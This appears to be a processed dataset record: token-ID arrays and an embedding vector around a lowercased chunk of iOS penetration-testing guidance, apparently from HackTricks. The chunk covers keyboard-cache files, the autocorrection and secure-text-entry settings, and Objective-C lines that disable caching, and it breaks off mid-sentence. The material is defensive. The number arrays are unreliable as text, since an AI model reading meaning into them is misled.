[ 13910, 22494, 4859, 1024, 1006, 21318, 29098, 19341, 3508, 1008, 1007, 4646, 1063, 1031, 2969, 1012, 4281, 9581, 3351, 6366, 19699, 22225, 6279, 2121, 8584, 1033, 1025, 1065, 2023, 4520, 1996, 4281, 3746, 2000, 2058, 8485, 9581, 3351, 1012, 1052, 3070, 7188, 1996, 4646, 2003, 4281, 2098, 1012, 2009, 16263, 7591, 2951, 29324, 2138, 2058, 8485, 9581, 3351, 1012, 1052, 3070, 2097, 2467, 2058, 15637, 1996, 2783, 3193, 1012, 3145, 24925, 13663, 27896, 2066, 3145, 24925, 2078, 1011, 15653, 2121, 2064, 2022, 2109, 2000, 15653, 1996, 3145, 24925, 2078, 1006, 1996, 11529, 2442, 2022, 7173, 29162, 1007, 1012, 2017, 2064, 2036, 2224, 16380, 3145, 24925, 2078, 15653, 2013, 22224, 1012, 24978, 3126, 15472, 5596, 24271, 3619, 3126, 15472, 5596, 24271, 2003, 1996, 3819, 2465, 2000, 3573, 5310, 18442, 1998, 20786, 1999, 1996, 3145, 24925, 2078, 1012, 2053, 2342, 2000, 8572, 2007, 24978, 20330, 3207, 7011, 11314, 2015, 4496, 2151, 3145, 24925, 2078, 10236, 4842, 1012, 2320, 1996, 5310, 2003, 26618, 1999, 1010, 2017, 2064, 3573, 2010, 5310, 18442, 1998, 20786, 2000, 1996, 3145, 24925, 2078, 1024, 24978, 3126, 15472, 5596, 24271, 1008, 13675, 14728, 19909, 1025, 13675, 14728, 19909, 1027, 1031, 24978, 3126, 15472, 5596, 24271, 13675, 14728, 19909, 24415, 20330, 1024, 5310, 18442, 20786, 1024, 20786, 28297, 1024, 24978, 3126, 15472, 5596, 24271, 7347, 27870, 5897, 4842, 2386, 4765, 1033, 1025, 1031, 1031, 24978, 3126, 15472, 5596, 24271, 23809, 4270, 4207, 16748, 16454, 26340, 4263, 4270, 1033, 2275, 16748, 16454, 4818, 1024, 13675, 14728, 19909, 2005, 21572, 26557, 9285, 15327, 1024, 2969, 1012, 8833, 2378, 21572, 26557, 9285, 15327, 1033, 1025, 2017, 2064, 2224, 22224, 1005, 1055, 16380, 24978, 3126, 15472, 5596, 24271, 23809, 4270, 15653, 2000, 15653, 2122, 7800, 1012, 7661, 6269, 1013, 9019, 17053, 19699, 5358, 16380, 1022, 1012, 1014, 6207, 4473, 2000, 16500, 7661, 14305, 2005, 16380, 2066, 7661, 6269, 1012, 1996, 5361, 6269, 2064, 2022, 3266, 3081, 10906, 1028, 2236, 1028, 9019, 1028, 6269, 7661, 6269, 2064, 2022, 2109, 2000, 27907, 1996, 6309, 13181, 9681, 1998, 4604, 2068, 2000, 1996, 17346, 8241, 1012, 2174, 1010, 3602, 2008, 7661, 6269, 9034, 14048, 20831, 2097, 2022, 19488, 2000, 1996, 5310, 1012, 2036, 1010, 1996, 5310, 2064, 6942, 2000, 1037, 2367, 1006, 2062, 9480, 1007, 9019, 2005, 10449, 1996, 22496, 1012, 9308, 1010, 5097, 2064, 4652, 2049, 5198, 2013, 2478, 7661, 6269, 2306, 1996, 10439, 1006, 2030, 2012, 2560, 2005, 7591, 3033, 1997, 1996, 10439, 1007, 1012, 2009, 1005, 1055, 6749, 2000, 2025, 3499, 2353, 2283, 6269, 2065, 2017, 5136, 1996, 5198, 2180, 1005, 1056, 2342, 2068, 22074, 2008, 2138, 1997, 8285, 1011, 6149, 1998, 8285, 1011, 15690, 1010, 1996, 12398, 16380, 9019, 2097, 5425, 1998, 3573, 2169, 2512, 1011, 3115, 2773, 2773, 1999, 1037, 17053, 5371, 2065, 1996, 17961, 5851, 4674, 18413, 4765, 2854, 2003, 2025, 2275, 2000, 2995, 2030, 2065, 8285, 27108, 2890, 7542, 13874, 2003, 2025, 2275, 2000, 21318, 18209, 4887, 3406, 27108, 2890, 7542, 13874, 3630, 1012, 2011, 12398, 1996, 6269, 3573, 2023, 17053, 2503, 1996, 5097, 5472, 8758, 1999, 3075, 1013, 9019, 1013, 1063, 2334, 2063, 1065, 1011, 8790, 1011, 3793, 1012, 23755, 5371, 2030 ]
hack_tricks
43.txt
13
in / private / var / mobile / library / keyboard / dynamic - text. dat. however, it might be saving the dateaelsewhere. it's possible to reset the cache in settings > general > reset > reset keyboard dictionarytherefore, check always these files and search for possible sensitive information. intercepting the network traffic is another way to check if the custom keyboard is sending keystroked to a remote server. the uitextinputtraits protocol is used for keyboard caching. the uitextfield, uitextview, and uisearchbar classes automatically support this protocol and it offers the following properties : var autocorrectiontype : uitextautocorrectiontype determines whether autocorrection is enabled during typing. when autocorrection is enabled, the text object tracks unknown words and suggests suitable replacements, replacing the typed text automatically unless the user overrides the replacement. the default value of this property is uitextautocorrectiontypedefault, which for most input methods enables autocorrection. var securetextentry : bool determines whether text copying and text caching are disabled and hides the text being entered for uitextfield. the default value of this property is no. to identify this behaviour in the code : search through the source code for similar implementations, such as textobject. autocorrectiontype = uitextautocorrectiontypeno ; textobject. securetextentry = yes ; open xib and storyboard files in the interface builder of xcode and verify the states of secure text entry and correction in the attributes inspector for the appropriate object. the application must prevent the caching of sensitive information entered into text fields. you can prevent caching by disabling it programmatically, using the textobject. autocorrectiontype = uitextautocorrectiontypeno directive in the desired uitextfields, uitextviews, and uisearchbars. for data that should be masked, such as pins and passwords, set textobject. securetextentry to yes. uitextfield * textfield = [ [ uitextfield alloc ] initwithframe : frame ] ; textfield. autocorrectiontype = uitextautocorrectiontypeno ; logsthe most common ways to debug code is using logging, and the application may print sensitive information inside the logs. in ios version 6 and below, logs were
[ 0.03154439479112625, -0.3676249086856842, -0.41958653926849365, 1.0696876049041748, -0.3194035291671753, 0.4265275001525879, 0.03562880679965019, -0.009002484381198883, 0.5916234254837036, 0.7311728596687317, -0.029923640191555023, -0.14081954956054688, 0.14882095158100128, -0.31873735785484314, -0.6523973345756531, -0.8635539412498474, -0.6713553667068481, -0.008274867199361324, -0.5544990301132202, -0.48653730750083923, -0.08447755873203278, 0.3445826470851898, -0.7800602316856384, -0.9165748357772827, -0.11708560585975647, 0.8187555074691772, 0.3160383105278015, 0.0005533145740628242, 0.506868839263916, 1.1068155765533447, 0.1797911822795868, 0.4390498697757721, 0.31747210025787354, -0.06656142324209213, -0.3364667296409607, -0.3663403391838074, 0.40606117248535156, -0.49408572912216187, 0.0527382530272007, -0.511027455329895, 0.3940253257751465, -0.31933853030204773, 0.1426491141319275, -0.3366544246673584, -0.9401814937591553, -0.794675886631012, -0.4025885760784149, -0.09325960278511047, 0.5557858347892761, -0.09942379593849182, 0.5828575491905212, -0.050643377006053925, 0.15676090121269226, 0.0578860305249691, 0.5735740661621094, 0.3291349709033966, -0.02800336666405201, -0.3780513405799866, -0.42621731758117676, 0.10738960653543472, 0.060402967035770416, 0.24770323932170868, -0.01951417326927185, -0.48518988490104675, -0.21296986937522888, -0.07708776742219925, 0.1974201649427414, -0.09396802634000778, -0.21664182841777802, -0.3339320719242096, -0.6405300498008728, -0.06078961491584778, -0.6751698851585388, -0.8396459817886353, -0.6507606506347656, 0.0951450765132904, -0.3782663941383362, -0.21335339546203613, -0.19321241974830627, 0.8639519214630127, -0.23344837129116058, 0.3537241816520691, 0.3821578323841095, -0.11410587280988693, -0.40925225615501404, -0.26886147260665894, 0.7191035747528076, 0.13552720844745636, -0.46531084179878235, 0.20564818382263184, 0.33918845653533936, 0.041562922298908234, -0.9198738932609558, -0.035599883645772934, 0.644748866558075, 0.7499774098396301, 0.008112220093607903, 0.03561405465006828, 0.6816729307174683, -0.2524772882461548, 0.41586393117904663, 0.146078959107399, 0.2442312389612198, 1.1364333629608154, -0.19670145213603973, 0.6812843084335327, 0.5922059416770935, 0.2182934433221817, -0.5537300705909729, 0.49164801836013794, 0.021421166136860847, -0.03423212096095085, 0.40987369418144226, -0.5760548114776611, -0.7987034916877747, 0.43221423029899597, 0.6167479753494263, 0.14873044192790985, -0.33298859000205994, 0.5566388368606567, -0.1449800580739975, -0.38451918959617615, 0.21069902181625366, 0.06520339846611023, 0.23473496735095978, 0.21024411916732788, 0.2527696490287781, 0.7234431505203247, -0.2768794894218445, -0.9053193926811218, -0.31965193152427673, -0.13152861595153809, 0.16661494970321655, 0.708654522895813, 0.0814346969127655, 0.1068815365433693, 0.08430176973342896, 0.2295895367860794, 0.15250669419765472, -0.299204021692276, 0.06944052129983902, 0.07013724744319916, 0.020328424870967865, 0.9726600646972656, 0.3891450762748718, -0.41594380140304565, -0.602745771408081, -0.3623139262199402, -0.226505845785141, 0.35070517659187317, -0.2687986493110657, 0.4593357741832733, 0.7098886966705322, -0.748371958732605, -0.20529010891914368, 0.41301825642585754, -0.0021319258958101273, 0.1806054264307022, -0.6534936428070068, 0.3407769799232483, -0.12072370946407318, 0.6779189109802246, 0.15240594744682312, 0.6279234886169434, -0.5600369572639465, 0.35604679584503174, -0.2627771198749542, -0.36532631516456604, -0.23080770671367645, -0.08208169043064117, 0.06404353678226471, 0.29825666546821594, -0.1301138699054718, 0.6320860981941223, 0.7166571617126465, 0.7218770980834961, -0.3139411211013794, -0.23578058183193207, 0.29596349596977234, 0.4104797840118408, -0.7513604164123535, 0.29730862379074097, -0.0038031486328691244, 0.32849201560020447, 0.6666203737258911, 0.217792809009552, -0.35422971844673157, -0.8975249528884888, -0.3681715130805969, 0.3318566083908081, -1.0533723831176758, 0.5350816249847412, 0.04313796013593674, 0.03691717982292175, 0.4501148760318756, 0.24304381012916565, -0.718402624130249, -0.3541458249092102, -0.35865387320518494, -1.0393903255462646, -0.3895558714866638, 0.4334268867969513, -0.06615976244211197, 0.8870511651039124, -0.6714451313018799, -0.2698954939842224, 1.0039258003234863, 0.8343911170959473, -0.09947655349969864, 1.639793872833252, 0.28593286871910095, -0.18958190083503723, -0.7056475281715393, -0.27604374289512634, -0.3555864095687866, -0.3661710023880005, -0.3603314459323883, 0.5153478384017944, -0.7216951847076416, 0.2397325336933136, -0.1701626181602478, 0.7419943809509277, 0.5187605023384094, 0.09267981350421906, 0.10217111557722092, 0.15791165828704834, 0.41172081232070923, 0.45941242575645447, 0.21423831582069397, -0.35945141315460205, -0.310772180557251, 1.1523380279541016, 0.1834019273519516, 0.6562784314155579, -0.3303329348564148, -0.05858230963349342, 0.11581680178642273, 0.3536296784877777, 0.2162465751171112, 0.28415054082870483, -0.027420945465564728, 0.641741156578064, 0.520077109336853, 0.5405597686767578, 0.1779373735189438, 0.42531275749206543, -0.09230451285839081, -0.26966986060142517, -0.3948940932750702, 0.5628039240837097, -0.014211604371666908, 0.6375949382781982, 0.638831377029419, 0.04635169729590416, -0.6269192695617676, -0.7659973502159119, 0.8358668088912964, 0.9859749674797058, -0.7261286377906799, -0.8034324049949646, -0.0868103951215744, -0.2766912877559662, -0.0709415152668953, -0.0771930143237114, 0.43878164887428284, 0.1962818205356598, -0.11181864142417908, 0.7333528995513916, -0.3839215934276581, -0.624376118183136, -0.7760644555091858, -0.9277524948120117, -0.740628182888031, -0.20758908987045288, -0.6951221227645874, 0.026609808206558228, 0.4698372185230255, -0.5165588855743408, 0.8438100218772888, -0.5700092315673828, -0.6661531329154968, 0.4545283019542694, -0.09074746072292328, 0.0005138518172316253, 0.0022554812021553516, 0.2445726990699768, -0.25582340359687805, 0.5075289011001587, 0.2907957434654236, 0.6429677605628967, 0.04061192274093628, -0.31790369749069214, -0.582594096660614, 0.2549939453601837, 0.037342242896556854, -0.4287818968296051, 1.1012212038040161, 0.19721245765686035, -0.16770870983600616, 0.08774907141923904, 0.6097943782806396, -0.0385294035077095, 0.06882277876138687, -0.2595219314098358, -0.6803480386734009, 0.9200716018676758, -0.2264852076768875, 0.4180000126361847, 0.43536949157714844, 0.6341379880905151, -0.9202799201011658, 0.2728070914745331, 0.15524090826511383, 0.8137048482894897, -0.5809648633003235, 0.16465584933757782, 0.30177080631256104, 0.22591006755828857, 0.31133589148521423, -0.1520780622959137, -0.08734679222106934, 0.14823712408542633, -0.02586565539240837, -0.058835409581661224, 0.28235679864883423, 0.3196110427379608, -0.05563246086239815, -1.0821244716644287, 0.7077812552452087, -0.3612579107284546, -0.5780957937240601, -0.017704006284475327, -0.22308164834976196, 1.0776633024215698, 0.3107684552669525, 0.11811936646699905, 0.2893088459968567, -0.6698077917098999, 0.148469015955925, 0.42609837651252747, 0.4978029131889343, -0.4164436161518097, -0.0626981258392334, 0.01998732052743435, 0.16963283717632294, 0.8080922961235046, -0.00028985674725845456, 0.1519021838903427, -0.582047700881958, -0.3815235495567322, -0.04303533956408501, 0.3004739284515381, 0.7595847249031067, -0.02541215531527996, 0.2436426430940628, 0.45026111602783203, -0.00928713008761406, 0.03401487320661545, 0.8378361463546753, 0.6301953196525574, 0.7871208786964417, 0.009078401140868664, 0.3380759060382843, 0.06075461208820343, -0.30581238865852356, -0.5298434495925903, 0.41613325476646423, 0.43610161542892456, 0.2486303746700287, 0.061406705528497696, 0.5697537064552307, -0.3649793565273285, 0.28967559337615967, 0.7390307188034058, -0.5665152668952942, -1.1528379917144775, 1.0241515636444092, -0.1624561846256256, 0.6237448453903198, -0.36984649300575256, 0.27794602513313293, -0.0010559792863205075, -0.08649426698684692, 0.6793761253356934, 0.771550714969635, 0.022141356021165848, -0.7668786644935608, -0.06739046424627304, 0.1387304663658142, -0.4997944235801697, 0.20027124881744385, 0.1621529757976532, 0.10252675414085388, -0.6188077330589294, -0.777420699596405, -0.5345955491065979, 0.7385936975479126, 0.645793616771698, 0.7783594131469727, 0.48360151052474976, 1.0643174648284912, -0.15002845227718353, -0.014805336482822895, 0.2680201828479767, -0.4110145568847656, 0.03443863242864609, -0.5332475304603577, 0.42815539240837097, -0.37545502185821533, 0.8019275069236755, 0.20967309176921844, -0.042144276201725006, -0.7257680296897888, 0.065877266228199, -0.18072420358657837, -0.2108347862958908, -0.4461379051208496, -0.37691524624824524, 0.08051643520593643, 0.1338982731103897, -1.0996378660202026, -0.38322561979293823, 0.06510362029075623, 0.24159152805805206, 0.42936453223228455, -0.5687024593353271, 0.07395008951425552, 0.03415391594171524, -0.04093046113848686, 0.0356876365840435, 0.6092970967292786, -0.09846822172403336, -0.3868370056152344, -0.6416043043136597, -1.0168260335922241, 0.2798111140727997, -0.05589354410767555, 0.41088128089904785, -0.24239061772823334, -0.7309149503707886, 0.3085745871067047, 0.673224151134491, -0.5807758569717407, -1.0999647378921509, 0.3623445928096771, 0.6253588199615479, 0.15772828459739685, 0.6917709112167358, -0.27155449986457825, -0.0513303279876709, 0.3757190406322479, -0.3659050762653351, 0.8241842985153198, -0.6272069811820984, -0.34127023816108704, -0.23521922528743744, 0.22273482382297516, 0.14479486644268036, 0.22401578724384308, -1.3287330865859985, 0.1146722361445427, -0.2228049486875534, 0.389494925737381, -0.1641332060098648, -0.3374244272708893, 0.4757201373577118, 0.0780576691031456, -0.40589281916618347, -0.45876580476760864, 0.207376167178154, -0.3026359975337982, 0.4087040424346924, -0.7841251492500305, -0.3432362675666809, 0.6693866848945618, -0.6450508236885071, 0.6849697232246399, -0.37498682737350464, -0.06715811043977737, -0.038185253739356995, -0.1271345168352127, 0.8884913921356201, -0.07508396357297897, 0.3320809006690979, -0.8422167897224426, -0.5996443629264832, 0.013924346305429935, 0.508840799331665, -0.01721036247909069, 0.35193026065826416, 0.046237509697675705, -0.5667507648468018, -0.48762309551239014, -0.1977587789297104, -1.2766602039337158, -0.3857479393482208, -0.30784231424331665, -0.15652920305728912, 0.060487762093544006, 0.2424425482749939, 0.541396975517273, -0.34973442554473877, -0.563607931137085, 0.11257445067167282, -0.16851693391799927, 0.44809073209762573, -0.7369150519371033, -0.6903277039527893, -0.575861394405365, 0.12921658158302307, -0.1370362937450409, 0.6535045504570007, 0.043488968163728714, 0.16602733731269836, 0.862723171710968, -0.2010733187198639, 0.39821338653564453, -0.20247554779052734, -0.9580258131027222, 0.7336485981941223, 0.43469059467315674, -0.24390193819999695, -0.17250914871692657, 0.333783358335495, -0.4768308997154236, 0.4533955454826355, -0.34077268838882446, -0.2912834584712982, -0.9443019032478333, -0.26113730669021606, 0.30337268114089966, -0.4757327437400818, 0.7086435556411743, -1.1887155771255493, -0.5384214520454407, -0.24263505637645721, 0.28793853521347046, -0.0024919044226408005, -0.5787361264228821, -0.33585649728775024, -0.4617234766483307, 0.2920156717300415, 0.04312433302402496, 0.17849227786064148, -0.40427231788635254, -1.103884220123291, -0.27541831135749817, 0.5876518487930298, 0.008991910144686699, 0.31496015191078186, -0.36719492077827454, -0.5025678277015686, 0.7279961705207825, 0.035563766956329346, -0.8682318329811096, -0.40337181091308594, 0.26561716198921204, 0.09044160693883896, 0.11723870038986206, -0.18242014944553375, -0.6202791929244995, 0.8129000067710876, 0.04063790664076805, -0.07363172620534897, -0.03827870637178421, -0.563012957572937, 0.1224401444196701, 0.29844149947166443, 0.4511928856372833, -0.5740422010421753, -0.397411048412323, -1.0530900955200195, 0.9456983804702759, 0.18165920674800873, 0.4434061348438263, -0.36712193489074707, -0.10500296205282211, -0.49407246708869934, -1.1532341241836548, 0.2566292881965637, -0.3511386811733246, 0.04359902814030647, 0.38217511773109436, -0.4024372696876526, 1.0674387216567993, -0.5462974905967712, 0.3659534752368927, 0.7992067337036133, 0.5427808165550232, 0.40972235798835754, -0.3263702094554901, 0.9242964386940002, 0.48046189546585083, -0.40071240067481995, -0.1762555092573166, -0.15895545482635498, -0.5838918089866638, -0.09150853753089905, -0.38607069849967957, -0.3466445207595825, -0.3555167019367218, -0.12381168454885483, 0.3959249258041382, -0.3810102343559265, 0.9440056681632996, 0.022819554433226585, -0.7443467378616333, -0.32720261812210083, 0.05666301026940346, 0.20244275033473969, 0.15274693071842194, 0.21263940632343292, -0.12356186658143997, -0.30388081073760986, -0.38448861241340637, 0.5210585594177246, -0.10719900578260422, -0.11654166132211685, 0.6094680428504944, 0.43321290612220764, -0.39864176511764526, 0.8041542768478394, 0.6724686026573181, -0.8905268907546997, -0.2094985544681549, -0.16262266039848328, -0.16184605658054352, -0.5027405619621277, -0.4775029420852661, -0.6625646948814392, 0.09954536706209183, -0.05824983865022659, -0.1281162053346634, 0.3580740988254547, -0.060193050652742386, 0.14932045340538025, -1.1198705434799194, 0.20722483098506927, -0.2526104152202606, -0.16318576037883759, 0.37273773550987244, -0.5850280523300171, 0.159633606672287, -0.91977858543396, 0.1321270614862442, 0.6385970115661621, -0.3339005708694458, 1.3070473670959473, -0.5316058993339539, 0.13566458225250244, 0.4537811875343323, -0.11485210061073303, 0.6963232755661011, 0.0203657578676939, -0.25086334347724915, 0.9176110029220581, 0.013177766464650631, -0.5947986841201782, -0.27248701453208923, 0.5199313759803772, 0.1302415430545807, 0.21627424657344818, -0.7905633449554443, -0.12757135927677155, -0.17891044914722443, 0.16637912392616272, -0.5900629758834839, -0.5008733868598938, -0.8163578510284424, -0.7043623924255371, -0.6646300554275513, -0.281466543674469, -0.36592891812324524, -0.34212884306907654, 0.6575901508331299, -0.07393532991409302, -0.36294254660606384, -0.45514559745788574, 1.316879391670227, -0.6478099226951599, 0.5169543623924255, -0.014651259407401085, 0.5001820921897888, -0.484058141708374, -0.5713393688201904, -0.4459604322910309, 0.25887665152549744, -0.7005179524421692, -0.42230910062789917, -0.17771323025226593, 0.15895386040210724, -1.0121299028396606, 0.152035653591156, -0.07592201977968216, 0.3405134081840515, -0.37443989515304565, 0.22149786353111267, 0.19722869992256165, 0.6124693751335144, -0.5409359931945801, -0.3321312665939331, 0.2236759513616562, 0.08748838305473328, 0.13575898110866547, -0.6874184012413025, -0.19835489988327026, -0.22036075592041016, 0.5441543459892273, 0.32357072830200195, 0.12193253636360168, -0.30716556310653687, 0.4566221535205841, -0.3164154291152954, -0.8896774649620056, 0.11531827598810196, -0.7929929494857788, 0.018653342500329018, 0.05098458006978035, -0.3483654856681824, 0.18420378863811493, 0.582330584526062, 0.18368123471736908, 0.7281705737113953, -1.0393502712249756, 0.2677259147167206, 0.2970539927482605, 0.04508878290653229, 0.2238217294216156, -0.5882595777511597, 0.3221666216850281, 0.04283523932099342, -0.03640696033835411, -0.13936041295528412, -0.22723665833473206, 0.7104496359825134, -0.24346326291561127, 0.01031199749559164, -1.0531519651412964, 0.3241390287876129, 0.2979187071323395, -0.044514529407024384, -0.040569860488176346, -0.3084131181240082, 0.29367968440055847, 0.00834107119590044, -0.660124659538269, 0.4002191722393036, -0.27695366740226746, -0.4183351397514343, -0.09080038219690323, -0.13628710806369781, -0.9027965068817139, -0.004021678119897842, 0.2475862354040146, -0.20765884220600128, -0.12454040348529816, 0.3728322684764862, 0.15341313183307648, -0.04998517408967018, -0.2707134187221527, 1.4417840242385864, 0.007303325459361076, -0.14084811508655548, -0.39752036333084106, 0.6075692772865295, -1.099291443824768, -0.42975714802742004, 0.44229474663734436, 0.6677072644233704, -0.04521971568465233, -0.18209344148635864, -1.1675492525100708, 0.09222539514303207, 0.6505377292633057, 0.4381301999092102, 0.34521913528442383, 0.0211502518504858, -0.2962464690208435, 0.08204401284456253, -0.8598551154136658, 0.582730770111084, 0.07416326552629471, -0.08015633374452591, -0.21606649458408356, -0.02878071926534176, -0.850307285785675, 0.337639182806015, 0.25122055411338806, -0.5232341289520264, 1.1296277046203613, 0.4615405797958374, 0.39275622367858887, -0.3711516857147217, -0.31893667578697205, -0.8586716651916504, 0.8398849368095398, 0.46782419085502625, 0.43724140524864197, -0.20875796675682068, 0.2664148807525635, 0.4580364525318146, -1.050808072090149, -0.5613715052604675, 0.3165087103843689, 0.02403906360268593, -0.4861524701118469, 0.2345992475748062, -0.6437090039253235, -0.002511747647076845, -0.4284140169620514, -0.4170728921890259, -0.08738494664430618, 0.004445533733814955, 0.5280389785766602, -0.1923525631427765, -0.7890294194221497, 0.602487325668335, -0.1404600441455841, 0.7381153106689453, -0.5621220469474792, 0.408086359500885, -0.24137817323207855, -0.018203679472208023, -0.8347089290618896, 0.621597945690155, 0.8023524880409241, -0.23920318484306335, 0.13517647981643677, 0.09736573696136475, -0.5612279176712036, 0.17963027954101562, -0.06682614982128143, -0.018704470247030258, -0.3137061893939972, 0.15212008357048035, 0.10864046961069107, -0.45296069979667664, -0.8587427735328674, 0.44971269369125366, 0.2096657007932663, -0.07181995362043381, -0.02846558392047882, -0.2120954990386963, -0.06662797182798386, -0.2895206809043884, 0.313752681016922, 0.1776432991027832, -0.14793066680431366, 0.3848966658115387, -0.454083651304245, -0.9683999419212341, 0.7899878621101379, -0.2494610995054245, 0.5238168835639954, -0.018827291205525398, 0.7361278533935547, 0.21856845915317535, 0.5285241603851318, 0.018190346658229828, -0.8407220840454102, -0.10875432193279266, -0.26069557666778564, -0.06344074755907059, -0.7147865295410156, 0.26418936252593994, -0.1911173015832901, 0.36689063906669617, -0.13844987750053406, -0.03987087681889534, -0.8759835958480835, 0.27663758397102356, -0.4326840043067932, -0.7137632966041565, 0.6524744033813477, -0.4862528443336487, -0.4510899484157562, 0.4044715464115143, 0.030614854767918587, 0.4278305768966675, 0.4945337176322937, -0.0987434834241867, -0.7350760102272034, -0.23119692504405975, 0.34278956055641174, -0.16378936171531677, 0.6620859503746033, -0.7171449065208435, -0.6945947408676147, 0.11947506666183472, -0.8757185935974121, -0.6334035992622375, -0.11598388850688934, -0.16798560321331024, -0.3711463510990143, 0.9181631803512573, 0.27469369769096375, 0.9499853849411011, 0.7201775312423706, -0.024694107472896576, -0.1196196898818016, 0.29584646224975586, 0.6261128187179565, -0.24629473686218262, 0.4910811185836792, 0.3759235739707947, 0.17782236635684967, 0.6498964428901672, -0.31303098797798157, 1.064226508140564, 0.0070336745120584965, -0.6383607983589172, -0.03721582517027855, -0.3041418492794037, -0.8421896696090698, -0.47824782133102417, 0.07273147255182266, 0.6889692544937134, -0.1346157193183899, 0.19686365127563477, -1.458145260810852, -0.11871443688869476, -0.2701193392276764, 0.3773411810398102, -0.044847652316093445, 0.16474439203739166, 0.05962194874882698, -0.07108402997255325, 0.4809630811214447, -1.2181053161621094, 4.357342720031738, 0.39020147919654846, 0.5021288990974426, -0.21991504728794098, 0.048669081181287766, 1.102710485458374, 1.3717714548110962, -0.3284653127193451, 0.3034343123435974, -0.3111962080001831, 0.4862178862094879, -0.1362246572971344, 0.5777122974395752, 0.8626413941383362, 0.3090977966785431, -0.2910423278808594, -0.5143221020698547, 0.2190641462802887, 0.14246317744255066, -0.8742477297782898, -0.7831429839134216, -0.20380501449108124, -0.19010455906391144, 0.76011061668396, 0.005112809129059315, 0.2212291657924652, 0.15347854793071747, -0.6940719485282898, -0.36901673674583435, 0.019739720970392227, 0.3064115345478058, -0.6193473935127258, 0.35076338052749634, -0.7430973052978516, -1.0100548267364502, 0.377341628074646, -0.18223704397678375, -1.1317470073699951, -0.44291388988494873, -0.18127788603305817, 0.3513700067996979, -0.30359506607055664, 0.27968934178352356, -0.3817364275455475, 0.30240878462791443, 0.88111412525177, -0.6726013422012329, 1.0280629396438599, 0.8829007148742676, -0.7541162967681885, 0.24312880635261536, -0.41914814710617065, 0.7299188375473022, -0.11209964752197266, -0.847797691822052, 0.20974403619766235, 0.22349683940410614, -0.8663661479949951, -0.34534841775894165, 0.41693899035453796, 0.0865827202796936, 0.013342120684683323, -0.08992284536361694, 0.10434360802173615, -0.6531084775924683, 0.15072619915008545, -0.3787483274936676, 0.7153556942939758, -0.5185772180557251, -0.19975413382053375, -0.25514456629753113, -0.32479673624038696, -0.3971899151802063, -0.3102222681045532, 0.5019269585609436, -0.16536790132522583, -0.27478039264678955, 1.0447219610214233, 0.3203471601009369, -0.0663854256272316, 0.30046364665031433, -0.4882214665412903, -0.8867902755737305, 0.06610706448554993, 0.5258490443229675, 0.8870203495025635, 0.1293836236000061, -0.2886638343334198, -0.0727568194270134, 0.665780782699585, 0.6097503304481506, 0.7351560592651367, -0.07256489247083664, -0.05622391775250435, 0.23134364187717438 ]
[ 1999, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 3075, 1013, 9019, 1013, 8790, 1011, 3793, 1012, 23755, 1012, 2174, 1010, 2009, 2453, 2022, 7494, 1996, 3058, 21147, 3366, 2860, 5886, 2063, 1012, 2009, 1005, 1055, 2825, 2000, 25141, 1996, 17053, 1999, 10906, 1028, 2236, 1028, 25141, 1028, 25141, 9019, 9206, 12399, 12879, 5686, 1010, 4638, 2467, 2122, 6764, 1998, 3945, 2005, 2825, 7591, 2592, 1012, 19115, 2075, 1996, 2897, 4026, 2003, 2178, 2126, 2000, 4638, 2065, 1996, 7661, 9019, 2003, 6016, 6309, 13181, 8126, 2000, 1037, 6556, 8241, 1012, 1996, 21318, 18209, 2378, 18780, 6494, 12762, 8778, 2003, 2109, 2005, 9019, 6187, 8450, 1012, 1996, 21318, 18209, 3790, 1010, 21318, 18209, 8584, 1010, 1998, 21318, 17310, 11140, 8237, 4280, 8073, 2490, 2023, 8778, 1998, 2009, 4107, 1996, 2206, 5144, 1024, 13075, 8285, 27108, 2890, 7542, 13874, 1024, 21318, 18209, 4887, 3406, 27108, 2890, 7542, 13874, 16463, 3251, 8285, 27108, 2890, 7542, 2003, 9124, 2076, 22868, 1012, 2043, 8285, 27108, 2890, 7542, 2003, 9124, 1010, 1996, 3793, 4874, 3162, 4242, 2616, 1998, 6083, 7218, 23936, 1010, 6419, 1996, 21189, 3793, 8073, 4983, 1996, 5310, 2058, 15637, 2015, 1996, 6110, 1012, 1996, 12398, 3643, 1997, 2023, 3200, 2003, 21318, 18209, 4887, 3406, 27108, 2890, 7542, 13874, 3207, 7011, 11314, 1010, 2029, 2005, 2087, 7953, 4725, 12939, 8285, 27108, 2890, 7542, 1012, 13075, 5851, 18209, 4765, 2854, 1024, 22017, 2140, 16463, 3251, 3793, 24731, 1998, 3793, 6187, 8450, 2024, 9776, 1998, 17382, 1996, 3793, 2108, 3133, 2005, 21318, 18209, 3790, 1012, 1996, 12398, 3643, 1997, 2023, 3200, 2003, 2053, 1012, 2000, 6709, 2023, 9164, 1999, 1996, 3642, 1024, 3945, 2083, 1996, 3120, 3642, 2005, 2714, 24977, 1010, 2107, 2004, 3793, 16429, 20614, 1012, 8285, 27108, 2890, 7542, 13874, 1027, 21318, 18209, 4887, 3406, 27108, 2890, 7542, 13874, 3630, 1025, 3793, 16429, 20614, 1012, 5851, 18209, 4765, 2854, 1027, 2748, 1025, 2330, 8418, 2497, 1998, 2466, 6277, 6764, 1999, 1996, 8278, 12508, 1997, 1060, 16044, 1998, 20410, 1996, 2163, 1997, 5851, 3793, 4443, 1998, 18140, 1999, 1996, 12332, 7742, 2005, 1996, 6413, 4874, 1012, 1996, 4646, 2442, 4652, 1996, 6187, 8450, 1997, 7591, 2592, 3133, 2046, 3793, 4249, 1012, 2017, 2064, 4652, 6187, 8450, 2011, 4487, 3736, 9709, 2009, 2565, 12644, 3973, 1010, 2478, 1996, 3793, 16429, 20614, 1012, 8285, 27108, 2890, 7542, 13874, 1027, 21318, 18209, 4887, 3406, 27108, 2890, 7542, 13874, 3630, 16449, 1999, 1996, 9059, 21318, 18209, 15155, 1010, 21318, 18209, 8584, 2015, 1010, 1998, 21318, 17310, 11140, 8237, 2015, 1012, 2005, 2951, 2008, 2323, 2022, 16520, 1010, 2107, 2004, 16300, 1998, 20786, 2015, 1010, 2275, 3793, 16429, 20614, 1012, 5851, 18209, 4765, 2854, 2000, 2748, 1012, 21318, 18209, 3790, 1008, 3793, 3790, 1027, 1031, 1031, 21318, 18209, 3790, 2035, 10085, 1033, 1999, 4183, 24415, 15643, 1024, 4853, 1033, 1025, 3793, 3790, 1012, 8285, 27108, 2890, 7542, 13874, 1027, 21318, 18209, 4887, 3406, 27108, 2890, 7542, 13874, 3630, 1025, 15664, 10760, 2087, 2691, 3971, 2000, 2139, 8569, 2290, 3642, 2003, 2478, 15899, 1010, 1998, 1996, 4646, 2089, 6140, 7591, 2592, 2503, 1996, 15664, 1012, 1999, 16380, 2544, 